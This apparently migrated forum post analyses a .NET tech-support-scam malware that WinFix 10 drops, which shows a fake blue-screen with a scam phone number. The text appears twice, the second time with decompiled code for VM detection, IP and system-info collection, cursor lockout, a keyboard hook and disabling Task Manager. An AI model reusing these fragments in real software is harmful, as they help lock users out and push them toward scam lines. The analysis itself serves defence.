This thread was originally posted in August 2015 in sysnative.com/blogs, by @Patrick . This has been moved over to the main forum as part of a software migration.
Original Post:
Recently there has been news of a new piece of malware going around, creating havoc on user’s machines with a fake BSOD screen. The Sysnative team first saw this on Bleeping Computer here (you can see my posts – ring 0).
The phone number to call for support is “888-991-9974”. Google searching (with cache) shows interesting results:
You can see here in an archive of the website that the old number is indeed there. Yet if you look up the site as of March 2015, there’s a different number. However, it also seems they’ve forgotten to update the old number in a few places on their site, such as here.
With all of that said, I set out to find how to get the specific .exe that was in charge of dropping this particular malware. Malwarebytes found a neat way to drop it, which was using iLivid. I wasn’t aware of iLivid at the time of our investigation, and the fact that it installed our wanted .exe, and I instead discovered WinFix 10 drops it.
Unfortunately, as I’m writing this article, I’ve noticed that the webpage for WinFix has pretty much been killed off by its host. Archive won’t show any reports of it either, so it looks like we won’t be able to access it anymore. In any case, even before the website was killed off, the download function on WinFix’s website didn’t work, so I needed to find out how to get its setup executable. Well, needless to say after digging for a bit, I discovered a fileserver index that holds the setup executable for WinFix, and this worked. The version that dropped ‘SenseIUpdaterN.exe’ for me was “WinFix_WINFIXMK”, as the others didn’t.
Note: Due to the website being killed off by the host, most likely for hosting malware, all of the malicous files stored were of course changed to not contain their original code. For example, ‘SenseIUpdaterN.exe’ is instead filled with preset HTML code from the host, rather than its payload. It was discovered by niemiro that if you change its extension to XML, and load it up in a web browser, you can see a custom 404 page from the host:
Taking a look at WinFix’s GUI real quick, we can see it’s essentially your basic fake registry cleaner/scanner that says there are issues with your system when there’s really not. For example, here are a few excerpts from a ~10 minute old clean install:
Notice my system health is “critical”.
For curiousity’s sake, if we do attempt to resolve these “problems”, here’s what happens:
So this software’s legitmacy is pretty self-explanatory. Overall, I wonder if the WinFix devs are in any relation to the GBOptimizer devs, if not the same people.
Moving onto the analysis, note some important keys below after the installation of WinFix 10. For example, the fake BSOD is consistently “called”/forced by a scheduled task that’s set, which you can see I commented in the code box below:
So what language was it programmed in?
Surprisingly, the malware was written in managed code (.NET). With that said, it’s relatively simple to disassemble/reverse. The first thing to note however is it checks to see if it’s running in a virtual environment (particularly VMware), and if so, the payload won’t execute, and you ultimately won’t experience the fake BSOD.
If no virtual environment is found and the proper argument to continue payload execution is passed, the malware then checks for various sysinfo:
As an example, here’s one of the sysinfo check excerpts regarding IP grabbing:
It uses the WebClient().DownloadString method to download the resource as a string.
If we disassemble the exe and check its resources, we can find a string table with the following contents:
The malware “calls” the 0xED bug check (which is really UNMOUNTABLE_BOOT_VOLUME) and prints it as IRQL_NOT_DISPATCH_LEVEL (which is really 0x8). To make matters even more interesting, the malware dev even pointed to the correct MSDN article for the bug check, but failed to put the correct bug check code. Note the following:
We can find the string replacement for {phone} in load_number0007x3().
It’s replacing {phone} with “PhoneNumber”, which is “1-800-901-1275 (USA – Canada)” by using the String.Replace method.
Let’s look further into the fake BSOD with this image:
Note “label1.Txt”. If we go through the code, we stumble upon this:
The use of the InitializeComponent() method is interesting to see, as its existence implies we can expect something GUI/art related. InitializeComponent() is used for WFP and Windows’ forms designer, and in this case it was the latter. We can guess that’s our fake BSOD, and we can guess right:
Let’s check label1:
So how does the fake BSOD inevitably occur?
Let’s look into this one by one:
What is this doing?
The dev created the function DisableMouse() that when called, hides the mouse cursor using the Cursor.Hide method. Not only is it hidden, but Cursor.Clip is used to clip the cursor by drawing a 1×1 rectangle at (50, 50), forcing it to move only in its clipping rectangle bounds.
What is this doing?
Under the main function, we can see:
This tells us somewhere in the code, we’ll find the SetWindowsHookEx function. This function installs an application-defined hook procedure into a hook chain, which allows for various system events to be monitored. Specifically, the parameter the dev used here installs the low-level keyboard input event hook procedure.
Why does the dev do this? Likely just to disable the keyboard.
Something interesting to note is, as a temporary workaround to a hard shutdown, the user can CTRL-ALT-DEL to bring up the menu, and then select ‘log out/sign out’ and re-log/sign back in to avoid the hard shutdown. The reason for this is, despite disabling Task Manager, you cannot disable CTRL-ALT-DEL handling outside of any sort of kernel-level code.
What is this doing?
It disables Task Manager by setting the value “DisableTaskMgr” to 1. I can only presume the dev obviously did this so users cannot bring up Task Manager and inspect the active system processes.
Overall, the malware itself isn’t in-depth nor impressive, however it’s interesting to see malware from a managed code perspective as opposed to the usual kernel-level malware we see nowadays.
Original Post:
Recently there has been news of a new piece of malware going around, creating havoc on user’s machines with a fake BSOD screen. The Sysnative team first saw this on Bleeping Computer here (you can see my posts – ring 0).
The phone number to call for support is “888-991-9974”. Google searching (with cache) shows interesting results:
Code:
Call us : (888) 991-9974. Email : support@gboptimizer.com. Address : 121 Newark Ave, Suite 555, Floor 5, Jersey City, NJ – 07302You can see here in an archive of the website that the old number is indeed there. Yet if you look up the site as of March 2015, there’s a different number. However, it also seems they’ve forgotten to update the old number in a few places on their site, such as here.
With all of that said, I set out to find how to get the specific .exe that was in charge of dropping this particular malware. Malwarebytes found a neat way to drop it, which was using iLivid. I wasn’t aware of iLivid at the time of our investigation, and the fact that it installed our wanted .exe, and I instead discovered WinFix 10 drops it.
Unfortunately, as I’m writing this article, I’ve noticed that the webpage for WinFix has pretty much been killed off by its host. Archive won’t show any reports of it either, so it looks like we won’t be able to access it anymore. In any case, even before the website was killed off, the download function on WinFix’s website didn’t work, so I needed to find out how to get its setup executable. Well, needless to say after digging for a bit, I discovered a fileserver index that holds the setup executable for WinFix, and this worked. The version that dropped ‘SenseIUpdaterN.exe’ for me was “WinFix_WINFIXMK”, as the others didn’t.
Note: Due to the website being killed off by the host, most likely for hosting malware, all of the malicous files stored were of course changed to not contain their original code. For example, ‘SenseIUpdaterN.exe’ is instead filled with preset HTML code from the host, rather than its payload. It was discovered by niemiro that if you change its extension to XML, and load it up in a web browser, you can see a custom 404 page from the host:
Taking a look at WinFix’s GUI real quick, we can see it’s essentially your basic fake registry cleaner/scanner that says there are issues with your system when there’s really not. For example, here are a few excerpts from a ~10 minute old clean install:
Notice my system health is “critical”.
For curiousity’s sake, if we do attempt to resolve these “problems”, here’s what happens:
So this software’s legitmacy is pretty self-explanatory. Overall, I wonder if the WinFix devs are in any relation to the GBOptimizer devs, if not the same people.
Moving onto the analysis, note some important keys below after the installation of WinFix 10. For example, the fake BSOD is consistently “called”/forced by a scheduled task that’s set, which you can see I commented in the code box below:
Code:
----------------------------------
Keys added: 20
----------------------------------
HKLM\SOFTWARE\Microsoft\Tracing\irsetup_RASAPI32
HKLM\SOFTWARE\Microsoft\Tracing\irsetup_RASMANCS
HKLM\SOFTWARE\Microsoft\Tracing\SenseIUpdaterN_RASAPI32
HKLM\SOFTWARE\Microsoft\Tracing\SenseIUpdaterN_RASMANCS
HKLM\SOFTWARE\Microsoft\Tracing\Winfix 10_RASAPI32
HKLM\SOFTWARE\Microsoft\Tracing\Winfix 10_RASMANCS
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Winfix 10 Pro1.0
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{949AC1BE-9B98-4B63-A32A-1AAA44EAB314}
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{53A78E81-167C-4C9F-8610-F5E0855D96FE}
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E4916F81-B0AC-4C4F-A8DA-835C669486B1}
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{53A78E81-167C-4C9F-8610-F5E0855D96FE}
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{949AC1BE-9B98-4B63-A32A-1AAA44EAB314}
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E4916F81-B0AC-4C4F-A8DA-835C669486B1}
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Winfix 10 Auto Start Logon
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Winfix Helper
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{b892d89f-cade-4f10-a61e-5493d54be5ca} // Here's the scheduled task that forces the fake BSOD
HKLM\SOFTWARE\Developerts LLC
HKLM\SOFTWARE\Developerts LLC\Winfix
HKLM\SOFTWARE\Winfix 10
HKU\S-1-5-21-1266725278-3163234071-714638740-1000\Software\Microsoft\GDIPlusSo what language was it programmed in?
Code:
Microsoft Visual C# / Basic .NETSurprisingly, the malware was written in managed code (.NET). With that said, it’s relatively simple to disassemble/reverse. The first thing to note however is it checks to see if it’s running in a virtual environment (particularly VMware), and if so, the payload won’t execute, and you ultimately won’t experience the fake BSOD.
Code:
public string isVirtualMachineCode0000X01()
{
string result;
foreach (ManagementBaseObject current in new ManagementObjectSearcher("Select * from Win32_ComputerSystem").Get())
{
string text = current["Manufacturer"].ToString().ToLower();
if (text.Contains("microsoft corporation") || text.Contains("vmware"))
{
result = "Yes";
return result;
}
if (current["Model"] != null)
{
string text2 = current["Model"].ToString().ToLower();
if (text2.Contains("microsoft corporation") || text2.Contains("vmware"))
{
result = "Yes";
return result;
}
}
}
result = "No";
return result;
}If no virtual environment is found and the proper argument to continue payload execution is passed, the malware then checks for various sysinfo:
Code:
}
cls_DB900042343242.IPAddress0000X01 = response.ipAddress; // IP address
cls_DB900042343242.CountryName0000X01 = response.countryName; // Country
cls_DB900042343242.CountryCode0000X01 = response.countryCode; // Country code (e.g. USA's code is 1)
cls_DB900042343242.CityName0000X01 = response.cityName; // City
cls_DB900042343242.RegionName0000X01 = response.regionName; // Region
cls_DB900042343242.ZipCode0000X01 = response.zipCode; // Zip code
cls_DB900042343242.TimeZone0000X01 = response.timeZone; // Timezone
cls_DB900042343242.MachineName0000X01 = Environment.MachineName; // Machine name (i.e. your computer's name)
cls_DB900042343242.OSVersion0000X01 = Environment.OSVersion.ToString(); // Prints the Microsoft OS version # to a readable product name string
cls_DB900042343242.ProcessorCount0000X01 = Environment.ProcessorCount.ToString(); // Prints the # of processors in the system
cls_DB900042343242.isVirtualMachine0000X01 = cls_DB900042343242.isVirtualMachineCode0000X01();
cls_DB900042343242.NetworkCode0000X01 = 7;
Settings.Default.X019988FFCB12 = cls_DB900042343242.SP_NewAlert0000X01();
Settings.Default.Save();
}As an example, here’s one of the sysinfo check excerpts regarding IP grabbing:
Code:
string arg = new WebClient().DownloadString("https://icanhazip.com");It uses the WebClient().DownloadString method to download the resource as a string.
If we disassemble the exe and check its resources, we can find a string table with the following contents:
Code:
ÎÊï¾ ‘ lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet PADPADPAâHÀ × l a b e l 1 . T e x t ëA problem has been detected and Windows has been shut down to prevent damage to your computer.
IRQL_NOT_DISPATCH_LEVEL
If this is the first time you've seen this error screen, restart your computer. If this screen appears again, follow these steps:
Check to make sure any new hardware or software is properly installed. If this is a new installation, ask your hardware or software manufacturer for any Windows updates you might need.
If problems continue, disable or remove any newly installed hardware. Disable BIOS memory options such as caching or shadowing. If you need to use Safe Mode to remove or disable components, restart your computer, press F8 to select Advanced Startup Options, and then select Safe Mode.
Technical Information:
*** STOP: 0X00000ed (0X80F128D0, 0xc000009c, 0x00000000, 0x0000000)
Beginning dump of physical memory
Physical memory dump complete.
Contact your system administrator or technical support group for further assistance.
More Info : https://msdn.microsoft.com/en-us/library/windows/hardware/ff559278(v=vs.85).aspx
For technical support assistance call : {phone}The malware “calls” the 0xED bug check (which is really UNMOUNTABLE_BOOT_VOLUME) and prints it as IRQL_NOT_DISPATCH_LEVEL (which is really 0x8). To make matters even more interesting, the malware dev even pointed to the correct MSDN article for the bug check, but failed to put the correct bug check code. Note the following:
Code:
For technical support assistance call : {phone}We can find the string replacement for {phone} in load_number0007x3().
Code:
private void load_number0007x3()
{
try
{
DataTable dataTable = new cls_DB900042343242
{
NetworkCode0000X01 = 7
}.SP_GetAlterPhoneNumber0000X01();
this.label1.Text = this.label1.Text.Replace("{phone}", dataTable.Rows[0]["PhoneNumber"].ToString());
}
catch (Exception)
{
this.label1.Text = this.label1.Text.Replace("{phone}", "1-800-901-1275 (USA - Canada)");
}
}It’s replacing {phone} with “PhoneNumber”, which is “1-800-901-1275 (USA – Canada)” by using the String.Replace method.
Let’s look further into the fake BSOD with this image:
Note “label1.Txt”. If we go through the code, we stumble upon this:
Code:
private void InitializeComponent()The use of the InitializeComponent() method is interesting to see, as its existence implies we can expect something GUI/art related. InitializeComponent() is used for WFP and Windows’ forms designer, and in this case it was the latter. We can guess that’s our fake BSOD, and we can guess right:
Code:
this.BackColor = Color.DarkBlue; // System-defined color that has an ARGB value of #FF00008B (our fake BSOD color)
base.ClientSize = new Size(883, 531); // Setting width/height of control area
base.Controls.Add(this.label1); // label1 is our font for the fake BSOD
base.FormBorderStyle = FormBorderStyle.None; // Set border style to none
base.MaximizeBox = false; // No maximize button located in the caption bar
base.MinimizeBox = false; // No minimize button located in the caption bar
base.Name = "frm_main";
base.ShowIcon = false; // No icon located in the caption bar
base.ShowInTaskbar = false; // No taskbar button/icon - also, alt+tabbing for previews will not show it
base.StartPosition = FormStartPosition.CenterScreen; // At run time of the form, center the form of the current screen
this.Text = "Form1";
base.FormClosed += new FormClosedEventHandler(this.frm_main_FormClosed);
base.Load += new EventHandler(this.frm_main_Load);
base.ResumeLayout(false);Let’s check label1:
Code:
this.label1 = new Label();
base.SuspendLayout();
this.label1.BackColor = Color.Transparent; // Set backcolor on the text to transparent so it's just the text
this.label1.Dock = DockStyle.Fill; // Control's edges are docked to the all edges of its containing control and sized appropriately
this.label1.Font = new Font("Courier New", 15f, FontStyle.Bold, GraphicsUnit.Point, 0); // Font is Courier New, 15px, bold
this.label1.ForeColor = Color.White; // Font color is white
this.label1.Location = new Point(0, 0);
this.label1.Name = "label1";
this.label1.Padding = new Padding(200, 0, 200, 0);
this.label1.Size = new Size(883, 531);
this.label1.TabIndex = 1;
this.label1.Text = componentResourceManager.GetString("label1.Text");
this.label1.TextAlign = ContentAlignment.MiddleLeft;
base.AutoScaleDimensions = new SizeF(6f, 13f);
base.AutoScaleMode = AutoScaleMode.Font;So how does the fake BSOD inevitably occur?
Code:
private void frm_main_Load(object sender, EventArgs e)
{
base.WindowState = FormWindowState.Maximized;
base.TopMost = true;
this.DisableMouse();
this.KeyboardHook(this, e);
this.SetTaskManager(false);
this.load_number0007x3();
}Let’s look into this one by one:
Code:
this.DisableMouse();What is this doing?
Code:
private void DisableMouse()
{
this.OldRect = Cursor.Clip;
this.BoundRect = new Rectangle(50, 50, 1, 1);
Cursor.Clip = this.BoundRect;
Cursor.Hide();
Application.AddMessageFilter(this);
}The dev created the function DisableMouse() that when called, hides the mouse cursor using the Cursor.Hide method. Not only is it hidden, but Cursor.Clip is used to clip the cursor by drawing a 1×1 rectangle at (50, 50), forcing it to move only in its clipping rectangle bounds.
Code:
this.KeyboardHook(this, e);Under the main function, we can see:
Code:
private const int WH_KEYBOARD_LL = 13;Why does the dev do this? Likely just to disable the keyboard.
Something interesting to note is, as a temporary workaround to a hard shutdown, the user can CTRL-ALT-DEL to bring up the menu, and then select ‘log out/sign out’ and re-log/sign back in to avoid the hard shutdown. The reason for this is, despite disabling Task Manager, you cannot disable CTRL-ALT-DEL handling outside of any sort of kernel-level code.
Code:
this.SetTaskManager(false);
Code:
public void SetTaskManager(bool enable)
{
RegistryKey registryKey = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System");
if (enable && registryKey.GetValue("DisableTaskMgr") != null)
{
registryKey.DeleteValue("DisableTaskMgr");
}
else
{
registryKey.SetValue("DisableTaskMgr", "1");
}
registryKey.Close();
}Overall, the malware itself isn’t in-depth nor impressive, however it’s interesting to see malware from a managed code perspective as opposed to the usual kernel-level malware we see nowadays.